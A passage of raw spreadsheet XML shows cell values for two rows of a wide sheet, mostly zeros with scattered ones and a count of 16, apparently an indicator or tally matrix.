      </c>
      <c r="KH10">
        <v>0</v>
      </c>
      <c r="KI10">
        <v>0</v>
      </c>
      <c r="KJ10">
        <v>0</v>
      </c>
      <c r="KK10">
        <v>0</v>
      </c>
      <c r="KL10">
        <v>0</v>
      </c>
      <c r="KM10">
        <v>0</v>
      </c>
      <c r="KN10">
        <v>0</v>
      </c>
      <c r="KO10">
        <v>0</v>
      </c>
      <c r="KP10">
        <v>0</v>
      </c>
      <c r="KQ10">
        <v>0</v>
      </c>
      <c r="KR10">
        <v>0</v>
      </c>
      <c r="KS10">
        <v>0</v>
      </c>
      <c r="KT10">
        <v>0</v>
      </c>
      <c r="KU10">
        <v>0</v>
      </c>
      <c r="KV10">
        <v>0</v>
      </c>
      <c r="KW10">
        <v>0</v>
      </c>
      <c r="KX10">
        <v>0</v>
      </c>
      <c r="KY10">
        <v>0</v>
      </c>
      <c r="KZ10">
        <v>0</v>
      </c>
      <c r="LA10">
        <v>0</v>
      </c>
      <c r="LB10">
        <v>0</v>
      </c>
      <c r="LC10">
        <v>0</v>
      </c>
      <c r="LD10">
        <v>0</v>
      </c>
      <c r="LE10">
        <v>0</v>
      </c>
      <c r="LF10">
        <v>0</v>
      </c>
      <c r="LG10">
        <v>0</v>
      </c>
      <c r="LH10">
        <v>0</v>
      </c>
      <c r="LI10">
        <v>0</v>
      </c>
      <c r="LJ10">
        <v>0</v>
      </c>
      <c r="LK10">
        <v>0</v>
      </c>
      <c r="LL10">
        <v>0</v>
      </c>
      <c r="LM10">
        <v>0</v>
      </c>
      <c r="LN10">
        <v>0</v>
      </c>
      <c r="LO10">
        <v>0</v>
      </c>
      <c r="LP10">
        <v>0</v>
      </c>
      <c r="LQ10">
        <v>0</v>
      </c>
      <c r="LR10">
        <v>0</v>
      </c>
      <c r="LS10">
        <v>0</v>
      </c>
      <c r="LT10">
        <v>0</v>
      </c>
      <c r="LU10">
        <v>0</v>
      </c>
      <c r="LV10">
        <v>0</v>
      </c>
      <c r="LW10">
        <v>0</v>
      </c>
      <c r="LX10">
        <v>0</v>
      </c>
      <c r="LY10">
        <v>0</v>
      </c>
      <c r="LZ10">
        <v>0</v>
      </c>
      <c r="MA10">
        <v>0</v>
      </c>
      <c r="MB10">
        <v>0</v>
      </c>
      <c r="MC10">
        <v>0</v>
      </c>
      <c r="MD10">
        <v>0</v>
      </c>
      <c r="ME10">
        <v>0</v>
      </c>
      <c r="MF10">
        <v>0</v>
      </c>
      <c r="MG10">
        <v>0</v>
      </c>
      <c r="MH10">
        <v>0</v>
      </c>
      <c r="MI10">
        <v>0</v>
      </c>
      <c r="MJ10">
        <v>0</v>
      </c>
      <c r="MK10">
        <v>0</v>
      </c>
      <c r="ML10">
        <v>0</v>
      </c>
      <c r="MM10">
        <v>0</v>
      </c>
      <c r="MN10">
        <v>0</v>
      </c>
      <c r="MO10">
        <v>0</v>
      </c>
      <c r="MP10">
        <v>0</v>
      </c>
      <c r="MQ10">
        <v>0</v>
      </c>
      <c r="MR10">
        <v>0</v>
      </c>
      <c r="MS10">
        <v>0</v>
      </c>
      <c r="MT10">
        <v>0</v>
      </c>
      <c r="MU10">
        <v>0</v>
      </c>
      <c r="MV10">
        <v>0</v>
      </c>
      <c r="MW10">
        <v>0</v>
      </c>
      <c r="MX10">
        <v>0</v>
      </c>
      <c r="MY10">
        <v>0</v>
      </c>
      <c r="MZ10">
        <v>0</v>
      </c>
      <c r="NA10">
        <v>0</v>
      </c>
      <c r="NB10">
        <v>0</v>
      </c>
      <c r="NC10">
        <v>0</v>
      </c>
      <c r="ND10">
        <v>0</v>
      </c>
      <c r="NE10">
        <v>0</v>
      </c>
      <c r="NF10">
        <v>0</v>
      </c>
      <c r="NG10">
        <v>0</v>
      </c>
      <c r="NH10">
        <v>0</v>
      </c>
      <c r="NI10">
        <v>0</v>
      </c>
      <c r="NJ10">
        <v>0</v>
      </c>
      <c r="NK10">
        <v>0</v>
      </c>
      <c r="NL10">
        <v>0</v>
      </c>
      <c r="NM10">
        <v>0</v>
      </c>
      <c r="NN10">
        <v>0</v>
      </c>
      <c r="NO10">
        <v>0</v>
      </c>
      <c r="NP10">
        <v>0</v>
      </c>
      <c r="NQ10">
        <v>0</v>
      </c>
      <c r="NR10">
        <v>0</v>
      </c>
      <c r="NS10">
        <v>0</v>
      </c>
      <c r="NT10">
        <v>0</v>
      </c>
      <c r="NU10">
        <v>0</v>
      </c>
      <c r="NV10">
        <v>0</v>
      </c>
      <c r="NW10">
        <v>0</v>
      </c>
      <c r="NX10">
        <v>0</v>
      </c>
      <c r="NY10">
        <v>0</v>
      </c>
      <c r="NZ10">
        <v>0</v>
      </c>
      <c r="OA10">
        <v>0</v>
      </c>
      <c r="OB10">
        <v>0</v>
      </c>
      <c r="OC10">
        <v>0</v>
      </c>
      <c r="OD10">
        <v>0</v>
      </c>
      <c r="OE10">
        <v>0</v>
      </c>
      <c r="OF10">
        <v>0</v>
      </c>
      <c r="OG10">
        <v>0</v>
      </c>
      <c r="OH10">
        <v>0</v>
      </c>
      <c r="OI10">
        <v>0</v>
      </c>
      <c r="OJ10">
        <v>0</v>
      </c>
      <c r="OK10">
        <v>0</v>
      </c>
      <c r="OL10">
        <v>0</v>
      </c>
      <c r="OM10">
        <v>0</v>
      </c>
      <c r="ON10">
        <v>0</v>
      </c>
      <c r="OO10">
        <v>0</v>
      </c>
      <c r="OP10">
        <v>0</v>
      </c>
      <c r="OQ10">
        <v>0</v>
      </c>
      <c r="OR10">
        <v>0</v>
      </c>
      <c r="OS10">
        <v>0</v>
      </c>
      <c r="OT10">
        <v>0</v>
      </c>
      <c r="OU10">
        <v>0</v>
      </c>
      <c r="OV10">
        <v>0</v>
      </c>
      <c r="OW10">
        <v>0</v>
      </c>
      <c r="OX10">
        <v>0</v>
      </c>
      <c r="OY10">
        <v>0</v>
      </c>
      <c r="OZ10">
        <v>0</v>
      </c>
      <c r="PA10">
        <v>0</v>
      </c>
      <c r="PB10">
        <v>0</v>
      </c>
      <c r="PC10">
        <v>0</v>
      </c>
      <c r="PD10">
        <v>0</v>
      </c>
      <c r="PE10">
        <v>0</v>
      </c>
      <c r="PF10">
        <v>0</v>
      </c>
      <c r="PG10">
        <v>0</v>
      </c>
      <c r="PH10">
        <v>0</v>
      </c>
      <c r="PI10">
        <v>0</v>
      </c>
      <c r="PJ10">
        <v>0</v>
      </c>
      <c r="PK10">
        <v>0</v>
      </c>
      <c r="PL10">
        <v>0</v>
      </c>
      <c r="PM10">
        <v>0</v>
      </c>
      <c r="PN10">
        <v>0</v>
      </c>
      <c r="PO10">
        <v>0</v>
      </c>
      <c r="PP10">
        <v>0</v>
      </c>
      <c r="PQ10">
        <v>0</v>
      </c>
      <c r="PR10">
        <v>0</v>
      </c>
      <c r="PS10">
        <v>0</v>
      </c>
      <c r="PT10">
        <v>0</v>
      </c>
      <c r="PU10">
        <v>0</v>
      </c>
      <c r="PV10">
        <v>0</v>
      </c>
      <c r="PW10">
        <v>0</v>
      </c>
      <c r="PX10">
        <v>0</v>
      </c>
      <c r="PY10">
        <v>0</v>
      </c>
      <c r="PZ10">
        <v>0</v>
      </c>
      <c r="QA10">
        <v>0</v>
      </c>
      <c r="QB10">
        <v>0</v>
      </c>
      <c r="QC10">
        <v>0</v>
      </c>
      <c r="QD10">
        <v>0</v>
      </c>
      <c r="QE10">
        <v>0</v>
      </c>
      <c r="QF10">
        <v>0</v>
      </c>
      <c r="QG10">
        <v>0</v>
      </c>
      <c r="QH10">
        <v>0</v>
      </c>
      <c r="QI10">
        <v>0</v>
      </c>
      <c r="QJ10">
        <v>0</v>
      </c>
      <c r="QK10">
        <v>0</v>
      </c>
      <c r="QL10">
        <v>0</v>
      </c>
      <c r="QM10">
        <v>0</v>
      </c>
      <c r="QN10">
        <v>0</v>
      </c>
      <c r="QO10">
        <v>0</v>
      </c>
      <c r="QP10">
        <v>0</v>
      </c>
      <c r="QQ10">
        <v>0</v>
      </c>
      <c r="QR10">
        <v>0</v>
      </c>
      <c r="QS10">
        <v>0</v>
      </c>
      <c r="QT10">
        <v>0</v>
      </c>
      <c r="QU10">
        <v>0</v>
      </c>
      <c r="QV10">
        <v>0</v>
      </c>
      <c r="QW10">
        <v>0</v>
      </c>
      <c r="QX10">
        <v>0</v>
      </c>
      <c r="QY10">
        <v>0</v>
      </c>
      <c r="QZ10">
        <v>0</v>
      </c>
      <c r="RA10">
        <v>0</v>
      </c>
      <c r="RB10">
        <v>0</v>
      </c>
      <c r="RC10">
        <v>0</v>
      </c>
      <c r="RD10">
        <v>0</v>
      </c>
      <c r="RE10">
        <v>0</v>
      </c>
      <c r="RF10">
        <v>0</v>
      </c>
      <c r="RG10">
        <v>0</v>
      </c>
      <c r="RH10">
        <v>0</v>
      </c>
      <c r="RI10">
        <v>0</v>
      </c>
      <c r="RJ10">
        <v>0</v>
      </c>
      <c r="RK10">
        <v>0</v>
      </c>
      <c r="RL10">
        <v>0</v>
      </c>
      <c r="RM10">
        <v>0</v>
      </c>
      <c r="RN10">
        <v>0</v>
      </c>
      <c r="RO10">
        <v>0</v>
      </c>
      <c r="RP10">
        <v>0</v>
      </c>
      <c r="RQ10">
        <v>0</v>
      </c>
      <c r="RR10">
        <v>0</v>
      </c>
      <c r="RS10">
        <v>0</v>
      </c>
      <c r="RT10">
        <v>0</v>
      </c>
      <c r="RU10">
        <v>0</v>
      </c>
      <c r="RV10">
        <v>0</v>
      </c>
      <c r="RW10">
        <v>0</v>
      </c>
      <c r="RX10">
        <v>0</v>
      </c>
      <c r="RY10">
        <v>0</v>
      </c>
      <c r="RZ10">
        <v>0</v>
      </c>
      <c r="SA10">
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A11" s="6" t="s">
        <v>2514</v>
      </c>
      <c r="B11">
        <v>16</v>
      </c>
      <c r="C11">
        <v>0</v>
      </c>
      <c r="D11">
        <v>0</v>
      </c>
      <c r="E11">
        <v>0</v>
      </c>
      <c r="F11">
        <v>0</v>
      </c>
      <c r="G11">
        <v>0</v>
      </c>
      <c r="H11">
        <v>1</v>
      </c>
      <c r="I11">
        <v>0</v>
      </c>
      <c r="J11">
        <v>0</v>
      </c>
      <c r="K11">
        <v>0</v>
      </c>
      <c r="L11">
        <v>0</v>
      </c>
      <c r="M11">
        <v>0</v>
      </c>
      <c r="N11">
        <v>0</v>
      </c>
      <c r="O11">
        <v>0</v>
      </c>
      <c r="P11">
        <v>0</v>
      </c>
      <c r="Q11">
        <v>0</v>
      </c>
      <c r="R11">
        <v>0</v>
      </c>
      <c r="S11">
        <v>0</v>
      </c>
      <c r="T11">
        <v>0</v>
      </c>
      <c r="U11">
        <v>0</v>
      </c>
      <c r="V11">
        <v>0</v>
      </c>
      <c r="W11">
        <v>0</v>
      </c>
      <c r="X11">
        <v>0</v>
      </c>
      <c r="Y11">
        <v>0</v>
      </c>
      <c r="Z11">
        <v>0</v>
      </c>
      <c r="AA11">
        <v>0</v>
      </c>
      <c r="AB11">
        <v>0</v>
      </c>
      <c r="AC11">
        <v>0</v>
      </c>
      <c r="AD11">
        <v>0</v>
      </c>
      <c r="AE11">
        <v>0</v>
      </c>
      <c r="AF11">
        <v>0</v>
      </c>
      <c r="AG11">
        <v>0</v>
      </c>
      <c r="AH11">
        <v>0</v>
      </c>
      <c r="AI11">
        <v>0</v>
      </c>
      <c r="AJ11">
        <v>0</v>
      </c>
      <c r="AK11">
        <v>0</v>
      </c>
      <c r="AL11">
        <v>0</v>
      </c>
      <c r="AM11">
        <v>0</v>
      </c>
      <c r="AN11">
        <v>1</v>
      </c>
      <c r="AO11">
        <v>1</v>
      </c>
      <c r="AP11">
        <v>0</v>
      </c>
      <c r="AQ11">
        <v>0</v>
      </c>
      <c r="AR11">
        <v>0</v>
      </c>
      <c r="AS11">
        <v>0</v>
      </c>
      <c r="AT11">
        <v>0</v>
      </c>
      <c r="AU11">
        <v>1</v>
      </c>
      <c r="AV11">
        <v>0</v>
      </c>
      <c r="AW11">
        <v>0</v>
      </c>
      <c r="AX11">
        <v>0</v>
      </c>
      <c r="AY11">
        <v>0</v>
      </c>
      <c r="AZ11">
        <v>0</v>
      </c>
      <c r="BA11">
        <v>0</v>
      </c>
      <c r="BB11">
        <v>0</v>
      </c>
      <c r="BC11">
        <v>0</v>
      </c>
      <c r="BD11">
        <v>0</v>
      </c>
      <c r="BE11">
        <v>0</v>
      </c>
      <c r="BF11">
        <v>0</v>
      </c>
      <c r="BG11">
        <v>0</v>
      </c>
      <c r="BH11">
        <v>0</v>
      </c>
      <c r="BI11">
        <v>0</v>
      </c>
      <c r="BJ11">
        <v>0</v>
      </c>
      <c r="BK11">
        <v>0</v>
      </c>
      <c r="BL11">
        <v>0</v>
      </c>
      <c r="BM11">
        <v>0</v>
      </c>
      <c r="BN11">
        <v>0</v>
      </c>
      <c r="BO11">
        <v>0</v>
      </c>
      <c r="BP11">
        <v>0</v>
      </c>
      <c r="BQ11">
        <v>0</v>
      </c>
      <c r="BR11">
        <v>0</v>
      </c>
      <c r="BS11">
        <v>0</v>
      </c>
      <c r="BT11">
        <v>0</v>
      </c>
      <c r="BU11">
        <v>0</v>
      </c>
      <c r="BV11">
        <v>0</v>
      </c>
      <c r="BW11">
        <v>0</v>
      </c>
      <c r="BX11">
        <v>1</v>
      </c>
      <c r="BY11">
        <v>0</v>
      </c>
      <c r="BZ11">
        <v>0</v>
      </c>
      <c r="CA11">
        <v>0</v>
      </c>
      <c r="CB11">
        <v>0</v>
      </c>
      <c r="CC11">
        <v>0</v>
      </c>
      <c r="CD11">
        <v>0</v>
      </c>
      <c r="CE11">
        <v>0</v>
      </c>
      <c r="CF11">
        <v>0</v>
      </c>
      <c r="CG11">
        <v>0</v>
      </c>
      <c r="CH11">
        <v>1</v>
      </c>
      <c r="CI11">
        <v>0</v>
      </c>
      <c r="CJ11">
        <v>0</v>
      </c>
      <c r="CK11">
        <v>0</v>
      </c>
      <c r="CL11">
        <v>0</v>
      </c>
      <c r="CM11">
        <v>0</v>
      </c>
      <c r="CN11">
        <v>0</v>
      </c>
      <c r="CO11">
        <v>0</v>
      </c>
      <c r="CP11">
        <v>0</v>
      </c>
      <c r="CQ11">
        <v>0</v>
      </c>
      <c r="CR11">
        <v>0</v>
      </c>
      <c r="CS11">
        <v>0</v>
      </c>
      <c r="CT11">
        <v>0</v>
      </c>
      <c r="CU11">
        <v>0</v>
      </c>
      <c r="CV11">
        <v>0</v>
      </c>
      <c r="CW11">
        <v>0</v>
      </c>
      <c r="CX11">
        <v>0</v>
      </c>
      <c r="CY11">
        <v>0</v>
      </c>
      <c r="CZ11">
        <v>0</v>
      </c>
      <c r="DA11">
        <v>0</v>
      </c>
      <c r="DB11">
        <v>0</v>
      </c>
      <c r="DC11">
        <v>0</v>
      </c>
      <c r="DD11">
        <v>0</v>
      </c>
      <c r="DE11">
        <v>0</v>
      </c>
      <c r="DF11">
        <v>0</v>
      </c>
      <c r="DG11">
        <v>0</v>
      </c>
      <c r="DH11">
        <v>0</v>
      </c>
      <c r="DI11">
        <v>0</v>
      </c>
      <c r="DJ11">
        <v>0</v>
      </c>
      <c r="DK11">
        <v>0</v>
      </c>
      <c r="DL11">
        <v>0</v>
      </c>
      <c r="DM11">
        <v>0</v>
      </c>
      <c r="DN11">
        <v>0</v>
      </c>
      <c r="DO11">
        <v>1</v>
      </c>
      <c r="DP11">
        <v>0</v>
      </c>
      <c r="DQ11">
        <v>0</v>
      </c>
      <c r="DR11">
        <v>0</v>
      </c>
      <c r="DS11">
        <v>0</v>
      </c>
      <c r="DT11">
        <v>0</v>
      </c>
      <c r="DU11">
        <v>0</v>
      </c>
      <c r="DV11">
        <v>0</v>
      </c>
      <c r="DW11">
        <v>0</v>
      </c>
      <c r="DX11">
        <v>0</v>
      </c>
      <c r="DY11">
        <v>0</v>
      </c>
      <c r="DZ11">
        <v>0</v>
      </c>
      <c r="EA11">
        <v>0</v>
      </c>
      <c r="EB11">
        <v>0</v>
      </c>
      <c r="EC11">
        <v>0</v>
      </c>
      <c r="ED11">
        <v>0</v>
      </c>
      <c r="EE11">
        <v>0</v>
      </c>
      <c r="EF11">
        <v>0</v>
      </c>
      <c r="EG11">
        <v>0</v>
      </c>
      <c r="EH11">
        <v>0</v>
      </c>
      <c r="EI11">
        <v>0</v>
      </c>
      <c r="EJ11">
        <v>0</v>
      </c>
      <c r="EK11">
        <v>0</v>
      </c>
      <c r="EL11">
        <v>0</v>
      </c>
      <c r="EM11">
        <v>0</v>
      </c>
      <c r="EN11">
        <v>0</v>
      </c>
      <c r="EO11">
        <v>0</v>
      </c>
      <c r="EP11">
        <v>0</v>
      </c>
      <c r="EQ11">
        <v>0</v>
      </c>
      <c r="ER11">
        <v>0</v>
      </c>
      <c r="ES11">
        <v>0</v>
      </c>
      <c r="ET11">
        <v>0</v>
      </c>
      <c r="EU11">
        <v>0</v>
      </c>
      <c r="EV11">
        <v>0</v>
      </c>
      <c r="EW11">
        <v>0</v>
      </c>
      <c r="EX11">
        <v>0</v>
      </c>
      <c r="EY11">
        <v>0</v>
      </c>
      <c r="EZ11">
        <v>0</v>
      </c>
      <c r="FA11">
        <v>0</v>
      </c>
      <c r="FB11">
        <v>0</v>
      </c>
      <c r="FC11">
        <v>0</v>
      </c>
      <c r="FD11">
        <v>0</v>
      </c>
      <c r="FE11">
        <v>0</v>
      </c>
      <c r="FF11">
        <v>0</v>
      </c>
      <c r="FG11">
        <v>0</v>
      </c>
      <c r="FH11">
        <v>0</v>
      </c>
      <c r="FI11">
        <v>0</v>
      </c>
      <c r="FJ11">
        <v>0</v>
      </c>
      <c r="FK11">
        <v>0</v>
      </c>
      <c r="FL11">
        <v>0</v>
      </c>
      <c r="FM11">
        <v>0</v>
      </c>
      <c r="FN11">
        <v>0</v>
      </c>
      <c r="FO11">
        <v>0</v>
      </c>
      <c r="FP11">
        <v>0</v>
      </c>
      <c r="FQ11">
        <v>0</v>
      </c>
      <c r="FR11">
        <v>0</v>
      </c>
      <c r="FS11">
        <v>0</v>
      </c>
      <c r="FT11">
        <v>0</v>
      </c>
      <c r="FU11">
        <v>0</v>
      </c>
      <c r="FV11">
        <v>0</v>
      </c>
      <c r="FW11">
        <v>0</v>
      </c>
      <c r="FX11">
        <v>0</v>
      </c>
      <c r="FY11">
        <v>0</v>
      </c>
      <c r="FZ11">
        <v>0</v>
      </c>
      <c r="GA11">
        <v>0</v>
      </c>
      <c r="GB11">
        <v>1</v>
      </c>
      <c r="GC11">
        <v>0</v>
      </c>
      <c r="GD11">
        <v>0</v>
      </c>
      <c r="GE11">
        <v>0</v>
      </c>
      <c r="GF11">
        <v>0</v>
      </c>
      <c r="GG11">
        <v>0</v>
      </c>
      <c r="GH11">
        <v>0</v>
      </c>
      <c r="GI11">
        <v>0</v>
      </c>
      <c r="GJ11">
        <v>0</v>
      </c>
      <c r="GK11">
        <v>0</v>
      </c>
      <c r="GL11">
        <v>0</v>
      </c>
      <c r="GM11">
        <v>0</v>
      </c>
      <c r="GN11">
        <v>0</v>
      </c>
      <c r="GO11">
        <v>0</v>
      </c>
      <c r="GP11">
        <v>0</v>
      </c>
      <c r="GQ11">
        <v>0</v>
      </c>
      <c r="GR11">
        <v>0</v>
      </c>
      <c r="GS11">
        <v>0</v>
      </c>
      <c r="GT11">
        <v>0</v>
      </c>
      <c r="GU11">
        <v>0</v>
      </c>
      <c r="GV11">
        <v>0</v>
      </c>
      <c r="GW11">
        <v>0</v>
      </c>
      <c r="GX11">
        <v>0</v>
      </c>
      <c r="GY11">
        <v>0</v>
      </c>
      <c r="GZ11">
        <v>0</v>
      </c>
      <c r="HA11">
        <v>0</v>
      </c>
      <c r="HB11">
        <v>0</v>
      </c>
      <c r="HC11">
        <v>0</v>
      </c>
      <c r="HD11">
        <v>0</v>
      </c>
      <c r="HE11">
        <v>0</v>
      </c>
      <c r="HF11">
        <v>0</v>
      </c>
      <c r="HG11">
        <v>0</v>
      </c>
      <c r="HH11">
        <v>0</v>
      </c>
      <c r="HI11">
        <v>0</v>
      </c>
      <c r="HJ11">
        <v>0</v>
      </c>
      <c r="HK11">
        <v>0</v>
      </c>
      <c r="HL11">
        <v>0</v>
      </c>
      <c r="HM11">
        <v>0</v>
      </c>
      <c r="HN11">
        <v>0</v>
      </c>
      <c r="HO11">
        <v>0</v>
      </c>
      <c r="HP11">
        <v>0</v>
      </c>
      <c r="HQ11">
        <v>0</v>
      </c>
      <c r="HR11">
        <v>0</v>
      </c>
      <c r="HS11">
        <v>0</v>
      </c>
      <c r="HT11">
        <v>0</v>
      </c>
      <c r="HU11">
        <v>0</v>
      </c>
      <c r="HV11">
        <v>0</v>
      </c>
      <c r="HW11">
        <v>0</v>
      </c>
      <c r="HX11">
        <v>0</v>
      </c>
      <c r="HY11">
        <v>0</v>
      </c>
      <c r="HZ11">
        <v>0</v>
      </c>
      <c r="IA11">
        <v>0</v>
      </c>
      <c r="IB11">
        <v>0</v>
      </c>
      <c r="IC11">
        <v>0</v>
      </c>
      <c r="ID11">
        <v>0</v>
      </c>
      <c r="IE11">
        <v>0</v>
      </c>
      <c r="IF11">
        <v>0</v>
      </c>
      <c r="IG11">
        <v>0</v>
      </c>
      <c r="IH11">
        <v>0</v>
      </c>
      <c r="II11">
        <v>0</v>
      </c>
      <c r="IJ11">
        <v>0</v>
      </c>
      <c r="IK11">
        <v>0</v>
      </c>
      <c r="IL11">
        <v>0</v>
      </c>
      <c r="IM11">
        <v>0</v>
      </c>
      <c r="IN11">
        <v>0</v>
      </c>
      <c r="IO11">
        <v>0</v>
      </c>
      <c r="IP11">
        <v>0</v>
      </c>
      <c r="IQ11">
        <v>0</v>
      </c>
      <c r="IR11">
        <v>0</v>
      </c>
      <c r="IS11">
        <v>0</v>
      </c>
      <c r="IT11">
        <v>0</v>
      </c>
      <c r="IU11">
        <v>0</v>
      </c>
      <c r="IV11">
        <v>0</v>
      </c>
      <c r="IW11">
        <v>0</v>
      </c>
      <c r="IX11">
        <v>0</v>
      </c>
      <c r="IY11">
        <v>0</v>
      </c>
      <c r="IZ11">
        <v>0</v>
      </c>
      <c r="JA11">
        <v>0</v>
      </c>
      <c r="JB11">
        <v>1</v>
      </c>
      <c r="JC11">
        <v>0</v>
      </c>
      <c r="JD11">
        <v>0</v>
      </c>
      <c r="JE11">
        <v>0</v>
      </c>
      <c r="JF11">
        <v>0</v>
      </c>
      <c r="JG11">
        <v>0</v>
      </c>
      <c r="JH11">
        <v>0</v>
      </c>
      <c r="JI11">
        <v>0</v>
      </c>
      <c r="JJ11">
        <v>0</v>
      </c>
      <c r="JK11">
        <v>1</v>
      </c>
      <c r="JL11">
        <v>0</v>
      </c>
      <c r="JM11">
        <v>0</v>
      </c>
      <c r="JN11">
        <v>0</v>
      </c>
      <c r="JO11">
        <v>0</v>
      </c>
      <c r="JP11">
        <v>0</v>
      </c>
      <c r="JQ11">
        <v>0</v>
      </c>
      <c r="JR11">
        <v>0</v>
      </c>
      <c r="JS11">
        <v>0</v>
      </c>
      <c r="JT11">
        <v>0</v>
      </c>
      <c r="JU11">
        <v>0</v>
      </c>
      <c r="JV11">
        <v>0</v>
      </c>
      <c r="JW11">
        <v>0</v>
      </c>
      <c r="JX11">
        <v>0</v>
      </c>
      <c r="JY11">
        <v>0</v>
      </c>
      <c r="JZ11">
        <v>0</v>
      </c>
      <c r="KA11">
        <v>0</v>
      </c>
      <c r="KB11">
        <v>0</v>
      </c>
      <c r="KC11">
        <v>0</v>
      </c>
      <c r="KD11">
        <v>0</v>
      </c>
      <c r="KE11">
        <v>0</v>
      </c>
      <c r="KF11">
        <v>0</v>
      </c>
      <c r="KG11">
        <v>1</v>
      </c>
      <c r="KH11">
        <v>0</v>
      </c>
      <c r="KI11">
        <v>0</v>
      </c>
      <c r="KJ11">
        <v>0</v>
      </c>
      <c r="KK11">
        <v>0</v>
      </c>
      <c r="KL11">
        <v>0</v>
      </c>
      <c r="KM11">
        <v>0</v>
      </c>
      <c r="KN11">
        <v>0</v>
      </c>
      <c r="KO11">
        <v>0</v>
      </c>
      <c r="KP11">
        <v>0</v>
      </c>
      <c r="KQ11">
        <v>0</v>
      </c>
      <c r="KR11">
        <v>0</v>
      </c>
      <c r="KS11">
        <v>0</v>
      </c>
      <c r="KT11">
        <v>0</v>
      </c>
      <c r="KU11">
        <v>0</v>
      </c>
      <c r="KV11">
        <v>0</v>
      </c>
      <c r="KW11">
        <v>0</v>
      </c>
      <c r="KX11">
        <v>1</v>
      </c>
      <c r="KY11">
        <v>0</v>
      </c>
      <c r="KZ11">
        <v>0</v>
      </c>
      <c r="LA11">
        <v>0</v>
      </c>
      <c r="LB11">
        <v>0</v>
      </c>
      <c r="LC11">
        <v>0</v>
      </c>
      <c r="LD11">
        <v>0</v>
      </c>
      <c r="LE11">
        <v>0</v>
      </c>
      <c r="LF11">
        <v>0</v>
      </c>
      <c r="LG11">
        <v>0</v>
      </c>
      <c r="LH11">
        <v>0</v>
      </c>
      <c r="LI11">
        <v>0</v>
      </c>
      <c r="LJ11">
        <v>0</v>
      </c>
      <c r="LK11">
        <v>0</v>
      </c>
      <c r="LL11">
        <v>0</v>
      </c>
      <c r="LM11">
        <v>0</v>
      </c>
      <c r="LN11">
        <v>0</v>
      </c>
      <c r="LO11">
        <v>0</v>
      </c>
      <c r="LP11">
        <v>0</v>
      </c>
      <c r="LQ11">
        <v>0</v>
      </c>
      <c r="LR11">
        <v>0</v>
      </c>
      <c r="LS11">
        <v>0</v>
      </c>
      <c r="LT11">
        <v>0</v>
      </c>
      <c r="LU11">
        <v>0</v>
      </c>
      <c r="LV11">
        <v>0</v>
      </c>
      <c r="LW11">
        <v>0</v>
      </c>
      <c r="LX11">
        <v>0</v>
      </c>
      <c r="LY11">
        <v>0</v>
      </c>
      <c r="LZ11">
        <v>0</v>
      </c>
      <c r="MA11">
        <v>0</v>
      </c>
      <c r="MB11">
        <v>0</v>
      </c>
      <c r="MC11">
        <v>0</v>
      </c>
      <c r="MD11">
        <v>0</v>
      </c>
      <c r="ME11">
        <v>0</v>
      </c>
      <c r="MF11">
        <v>0</v>
      </c>
      <c r="MG11">
        <v>0</v>
      </c>
      <c r="MH11">
        <v>0</v>
      </c>
      <c r="MI11">
        <v>0</v>
      </c>
      <c r="MJ11">
        <v>0</v>
      </c>
      <c r="MK11">
        <v>0</v>
      </c>
      <c r="ML11">
        <v>0</v>
      </c>
      <c r="MM11">
        <v>0</v>
      </c>
      <c r="MN11">
        <v>0</v>
      </c>
      <c r="MO11">
        <v>0</v>
      </c>
      <c r="MP11">
        <v>0</v>
      </c>
      <c r="MQ11">
        <v>0</v>
      </c>
      <c r="MR11">
        <v>0</v>
      </c>
      <c r="MS11">
        <v>0</v>
      </c>
      <c r="MT11">
        <v>0</v>
      </c>
      <c r="MU11">
        <v>0</v>
      </c>
      <c r="MV11">
        <v>0</v>
      </c>
      <c r="MW11">
        <v>0</v>
      </c>
      <c r="MX11">
        <v>0</v>
      </c>
      <c r="MY11">
        <v>0</v>
      </c>
      <c r="MZ11">
        <v>0</v>
      </c>
      <c r="NA11">
        <v>0</v>
      </c>
      <c r="NB11">
        <v>0</v>
      </c>
      <c r="NC11">
        <v>0</v>
      </c>
      <c r="ND11">
        <v>0</v>
      </c>
      <c r="NE11">
        <v>0</v>
      </c>
      <c r="NF11">
        <v>0</v>
      </c>
      <c r="NG11">
        <v>0</v>
      </c>
      <c r="NH11">
        <v>0</v>
      </c>
      <c r="NI11">
        <v>0</v>
      </c>
      <c r="NJ11">
        <v>0</v>
      </c>
      <c r="NK11">
        <v>0</v>
      </c>
      <c r="NL11">
        <v>0</v>
      </c>
      <c r="NM11">
        <v>0</v>
      </c>
      <c r="NN11">
        <v>0</v>
      </c>
      <c r="NO11">
        <v>0</v>
      </c>
      <c r="NP11">
        <v>0</v>
      </c>
      <c r="NQ11">
        <v>0</v>
      </c>
      <c r="NR11">
        <v>0</v>
      </c>
      <c r="NS11">
        <v>0</v>
      </c>
      <c r="NT11">
        <v>0</v>
      </c>
      <c r="NU11">
        <v>0</v>
      </c>
      <c r="NV11">
        <v>0</v>
      </c>
      <c r="NW11">
        <v>0</v>
      </c>
      <c r="NX11">
        <v>0</v>
      </c>
      <c r="NY11">
        <v>0</v>
      </c>
      <c r="NZ11">
        <v>0</v>
      </c>
      <c r="OA11">
        <v>0</v>
      </c>
      <c r="OB11">
        <v>0</v>
      </c>
      <c r="OC11">
        <v>0</v>
      </c>
      <c r="OD11">
        <v>0</v>
      </c>
      <c r="OE11">
        <v>1</v>
      </c>
      <c r="OF11">
        <v>0</v>
      </c>
      <c r="OG11">
        <v>0</v>
      </c>
      <c r="OH11">
        <v>0</v>
      </c>
      <c r="OI11">
        <v>0</v>
      </c>
      <c r="OJ11">
        <v>0</v>
      </c>
      <c r="OK11">
        <v>0</v>
      </c>
      <c r="OL11">
        <v>0</v>
      </c>
      <c r="OM11">
        <v>1</v>
      </c>
      <c r="ON11">
        <v>0</v>
      </c>
      <c r="OO11">
        <v>0</v>
      </c>
      <c r="OP11">
        <v>0</v>
      </c>
      <c r="OQ11">
        <v>0</v>
      </c>
      <c r="OR11">
        <v>0</v>
      </c>
      <c r="OS11">
        <v>0</v>
      </c>
      <c r="OT11">
        <v>0</v>
      </c>
      <c r="OU11">
        <v>0</v>
      </c>
      <c r="OV11">
        <v>0</v>
      </c>
      <c r="OW11">
        <v>0</v>
      </c>
      <c r="OX11">
        <v>0</v>
      </c>
      <c r="OY11">
        <v>0</v>
      </c>
      <c r="OZ11">
        <v>0</v>
      </c>
      <c r="PA11">
        <v>0</v>
      </c>
      <c r="PB11">
        <v>0</v>
      </c>
      <c r="PC11">
        <v>0</v>
      </c>
